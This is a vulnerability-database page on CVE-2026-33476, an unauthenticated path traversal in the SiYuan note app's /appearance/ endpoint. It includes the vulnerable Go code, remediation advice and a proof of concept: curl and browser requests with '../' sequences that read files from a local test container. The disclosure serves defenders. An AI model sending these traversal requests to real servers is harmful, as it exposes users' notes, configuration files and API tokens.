Skip to main content

Docker CVE-2026-33476

HIGH
Path Traversal (CWE-22)
2026-03-20 https://github.com/siyuan-note/siyuan GHSA-hhgj-gg9h-rjp7
7.5
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.5 HIGH
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
SUSE
HIGH
qualitative

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

3
Analysis Generated
Mar 20, 2026 - 20:46 vuln.today
Patch released
Mar 20, 2026 - 20:46 nvd
Patch available
CVE Published
Mar 20, 2026 - 20:43 nvd
HIGH 7.5

DescriptionGitHub Advisory

Summary

The Siyuan kernel exposes an unauthenticated file-serving endpoint under /appearance/*filepath. Due to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process.

Authentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials.

Details

Vulnerable Code Location

File: kernel/server/serve.go

sh
siyuan.GET("/appearance/*filepath", func(c *gin.Context) {
    filePath := filepath.Join(
        appearancePath,
        strings.TrimPrefix(c.Request.URL.Path, "/appearance/")
    )
    ...
    c.File(filePath)
})

Technical Root Cause

The handler constructs a filesystem path by joining a base directory (appearancePath) with user-controlled URL segments.

Key issues:

1. Unsanitized User Input

The path component extracted from the request is not validated or normalized to prevent traversal.

sh
strings.TrimPrefix(c.Request.URL.Path, "/appearance/")

This preserves sequences such as:

sh
../
..\ (Windows)

2. Unsafe Path Joining

_filepath.Join()_ does not enforce directory confinement.

This escapes the intended directory.

3. Direct File Serving

The resolved path is served without verification:

sh
c.File(filePath)

Authentication Bypass (Unauthenticated Access)

Authentication middleware explicitly skips /appearance/ requests.

File: session.go

sh
if strings.HasPrefix(c.Request.RequestURI, "/appearance/") ||
    strings.HasPrefix(c.Request.RequestURI, "/stage/build/export/") ||
    strings.HasPrefix(c.Request.RequestURI, "/stage/protyle/") {
    c.Next()
    return
}

This allows attackers to access the vulnerable endpoint without a session or token.

Exploitation Scenario

A remote attacker can craft a URL containing directory traversal sequences to read files accessible to the Siyuan process.

Example request:

GET /appearance/../../data/conf.json HTTP/1.1
Host: target

Because authentication is bypassed, the attack requires no credentials.

PoC

Step 1 - Create marker file

mkdir -p ./workspace/data
echo POC_EXPLOITED > ./workspace/data/poc_exploit.txt

Step 2 - Run SiYuan container

docker run -d \
  -p 6806:6806 \
  -e SIYUAN_ACCESS_AUTH_CODE_BYPASS=true \
  -v $(pwd)/workspace:/siyuan/workspace \
  b3log/siyuan \
  --workspace=/siyuan/workspace

Step 3 - Confirm service works

Open in browser:

sh
http://127.0.0.1:6806

Exploit PoC

Method A - using CURL command

Use --path-as-is so curl does NOT normalize ../.

sh
curl -v --path-as-is \
  "http://127.0.0.1:6806/appearance/../../data/poc_exploit.txt"

Output

sh
HTTP/1.1 200 OK
POC_EXPLOITED

Method B - Using Browser

sh
http://127.0.0.1:6806/appearance/../../data/poc_exploit.txt

If method B is not working, use method A, which is CURL command to do the exploit

Impact

An unauthenticated attacker can read arbitrary files accessible to the server process, including:

  • Workspace configuration files
  • User notes and stored data
  • API tokens and secrets
  • Local system files (depending on permissions)

This may lead to:

  • Sensitive information disclosure
  • Credential leakage
  • Further compromise through exposed secrets

AnalysisAI

An unauthenticated directory traversal vulnerability exists in Siyuan kernel's /appearance/ endpoint, allowing remote attackers to read arbitrary files accessible to the server process without authentication. The vulnerability affects the Go-based Siyuan note-taking application (github.com/siyuan-note/siyuan/kernel) and has been assigned a CVSS score of 7.5 (High). A working proof-of-concept exploit is publicly available demonstrating successful file retrieval via crafted URLs containing path traversal sequences, and a patch has been released by the vendor.

Technical ContextAI

Siyuan is a Go-based personal knowledge management and note-taking application distributed as a Docker container and standalone binary. The vulnerability resides in kernel/server/serve.go where the Gin web framework handler for /appearance/*filepath endpoint constructs filesystem paths using filepath.Join() with unsanitized user input from URL path segments. The root cause maps to CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) where the code uses strings.TrimPrefix() to extract the path component without normalizing or validating traversal sequences like ../ before passing it to c.File() for direct file serving. The authentication bypass occurs because session.go explicitly exempts /appearance/ routes from authentication middleware checks, treating them as public static resources when they should be protected. The affected package identifier is pkg:go/github.com_siyuan-note_siyuan_kernel, indicating this is a vulnerability in the core kernel module of the application.

RemediationAI

Upgrade Siyuan to the patched version incorporating commit 009bb598b3beccc972aa5f1ed88b3b224326bf2a or later as documented in the vendor security advisory at https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7. For Docker deployments, pull the latest b3log/siyuan image that includes the fix and recreate containers. Until patching is complete, implement network-level access controls to restrict the /appearance/ endpoint to trusted IP ranges only, deploy Siyuan behind a reverse proxy with path normalization that blocks traversal sequences, or disable network access entirely and operate in localhost-only mode. Review server logs for suspicious requests containing ../ patterns in /appearance/ paths to identify potential exploitation attempts. After patching, rotate any API tokens, access codes, or credentials that may have been exposed through workspace configuration files, and audit workspace data for unauthorized access.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Vendor StatusVendor

SUSE

Severity: High
Product Status
openSUSE Leap 15.6 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP5 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP6 Fixed
openSUSE Leap 15.5 Fixed

Share

CVE-2026-33476 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy